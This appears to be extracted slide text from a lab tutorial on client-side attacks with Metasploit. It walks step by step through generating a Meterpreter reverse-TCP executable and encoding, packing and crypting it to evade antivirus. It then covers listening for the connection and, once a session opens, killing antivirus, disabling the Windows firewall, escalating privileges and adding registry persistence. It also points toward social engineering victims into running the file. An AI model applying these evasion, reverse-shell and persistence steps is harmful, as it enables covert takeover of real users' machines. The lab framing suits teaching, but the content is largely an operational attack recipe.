1. Client Side Exploits Metasploit, Meterpreter, Obfuscation , Rogue Websites and Ettercap.

2. Tools Kali Linux: Metasploit (msfconsole, msfpayload, msfencode) Ettercap Apache Windows Nemesis Crypter .Net Shrink DeepSea Obfuscator 3. Testing Environment pt.1 All examples shown will be performed in a controlled network, I do not condone the use of these methods in the wild. Host Network 192.168.1.0/24Host ComputerVirtualised Environment (Oracle VirtualBox) WAN 192.168.56.0/24 LAN 10.0.2.0/24 Virtual Router (pfSense) WAN 10.0.2.15 LAN 192.168.2.0/24Attacker (Kali)Client (Win7) 4. Testing Environment pt.2VirtualBox Configuration 1. 2. 3. 4. 5.Download pfSense ISO (http://www.pfsense.org) Create new VM using wizard Install 2 NICs NIC 1 should be configured to use NAT NIC 2 should be configured to use Internal Network 5. Testing Environment pt.3Kali Linux Configuration 1. 2.3. 4. 5.Apt-get update, upgrade, dist-upgrade, install -y linux-headers-$(uname -r) cp /media/cd-rom/VBoxLinuxAdditions.run /root/ chmod 755 /root/VBoxLinuxAdditions.run cd /root ./VBoxLinuxAdditions.run update-rc.d postgresql enable update-rc.d metasploit enable msfupdate 6. Metasploit pt.1 Payload Creation Using msfpayload h we can see all the available options. Using l will show all of the available payloads, for this example me will be generating a meterpreter shell to connect back to the attacker due to its flexibility. Selecting the meterpreter reverse tcp payload Using msfpayload windows/meterpreter/reverse_tcp O will give use the payload options which we will input in the next step X to create an executable > pay.exe exports the payload to filename pay.exe We will now have the executable pay.exe on our desktopHere we can choose how to output the payload, we can export to C, Ruby for later compiling or we can export to Java if we wanted to create an applet attack. For this example however we will be exporting to an executable for an infectious media attackWe have 2 configurable options for this payload: 1. LHOST this is the address of the attacking machine (for this lab we will use a local address however you can use an external address for a remote attack) 2. LPORT this is the port used to connect back to the attacker, for this lab we will use port 4444 however if you are behind a restrictive firewall you may want to select a port that will be open e.g 443 (ssl) or 53 (dns). Also if this is a remote attack you would have to port forward the selected port 7. Checking Our Work Uploading the file to Metascan will check our payload against 43 antivirus scanning engines Unfortunately the payload we created was detected 26 times, we now have to work on lowering this detection rate 8. Metasploit pt.2 Payload Encoding We use msfencode using the same command, however we now use the switch R to output the file as RAW and use | to pipe the file into msfencode the raw output of the prevous command is piped into another encoder using | We use msfencode e x86/countdown c 5 t exe o payenc.exe to encode the file again and then output the resultant to payenc.exeNote: this is by no means a comprehensive coverage of msfpayload or msfencode, I suggest reading Metasploit: The Penetration Testers Guide for full usage of these tools.Msfencode: -e selects the encoder (in the example shikata_ga_nai is used) -c sets the number of times the payload is encoded -t sets the output file to RAWLastly we will pack our file to add an extra layer of obscurity using the following command: Upx -9 payenc.exe payencpacked.exe 9. Checking Our Work Uploading the file shows the results are not good, antivirus vendors are getting wise towards the encoders we used. We now need to utilise some other methods to Obfuscate the payload further 10. Obfuscation pt.1 Over to you Windows Nemesis Crypter 1. Main select location of file 2. Options - set the encryption algorithm to AES 3. Assembly Information Set to random 4. Crypt file 11. Checking Our Work Notice a Pattern Emerging Ok so thats a good enough detection rate. Its interesting to note that all the free antivirus vendors failed to detect our payload (AVG I'm looking at you) whilst Norton and Kaspersky still detected, thus highlighting the need to PAY for a good antivirus. 12. Obfuscation pt.2 .net ShrinkNo one method is fool proof, however there are hundreds of tools to further obfuscate your payload you just need to experimentDeepSea Obfuscatior.net ReactorAntivirus vendors will eventually become wise to all encoders and obfuscators I hope this highlights the importance of having a good antivirus (remember to laugh at apple fan boys when they say they are immune to viruses) 13. Where are we now We now have a payload that has a low detection rate.what do we do now? Two things need to be accomplished: 1. We need a method for the payload to connect from the client machine to the attacking machine (this is a client side attack remember) 2. We need a way to get the victim to execute the payload (think social engineering, I will look forward to hearing your ideas) 14. Metasploit pt.3 Remember that we programmed our payload to reverse connect to 192.168.2.11:4444 We now need to set metasploit to listen for connections on 192.168.2.11:4444Start metasploit using msfconsoleStarts listening for client connections 15. Metasploit pt.3 cont.Set LHOST sets the listen address which is the ip of the attacker machineset LPORT sets the listen portExploit starts the listenerThe attacking machine is now ready to accept incoming connections 16. User on client machine clicks malicious file notice that nothing suspicious happens user assumes that it is just a broken file little do they knowMeanwhile the attacker machine has accepted a remote connection from the clientA meterpreter session is now open 17. if we issue a netstat a on the client machine to list all remote connections we see the connection from 192.168.2.7 (the client) to 192.168.2.11:4444 (the attacker) 18. Meterpreter Post-Exploitation We have our meterpreter session to the client machine we now need to ensure the client stays compromised: 1. Kill any antivirus (although our payload hasn't been detected, any future modifications may reveal the payload to the antivirus). 2. Kill firewall 3. Migrate the meterpreter session to a secure process 4. Elevate our privileges 5. Make our meterpreter session persistent through reboots 19. Idletime - we dont want to run these commands when the user is present Ps shows the running processes on the client machine We now need to disable the antivirus , in this case the client is running security essentials msseces.exe = 2356 so we issue kill 2356 (note: it is useful to familiarise yourself with the processes other antivirus packages use). Currently meterpreter is running as process abc.exe which is highly suspicious, using the migrate command we will run meterpreter as explorer.exe (note: when using meterpreter we use the PID number rather than the process name e.g. explorer.exe = 1424).Using getsystem and getprivs gives us the system user account and all the associated privileges.Using shell we drop down into the windows command line and issue the command netsh advfirewall set allprofiles state off. The windows firewall is now off.The system is now defenceless and we have complete control. I hope this slide has demonstrated the multidisciplinary nature of hacking by using both the Linux and windows command line. I would recommend reading the following texts to further familiarise yourselves with both command lines. 20. Meterpreter Maintaining Access1.Use the shell command to get a windows command prompt2.We are now going to add a registry key that executes the payload at every boot by using the command reg add path to registry key3./v names the registry key4./t specifies the key type5./d defines the path to our executable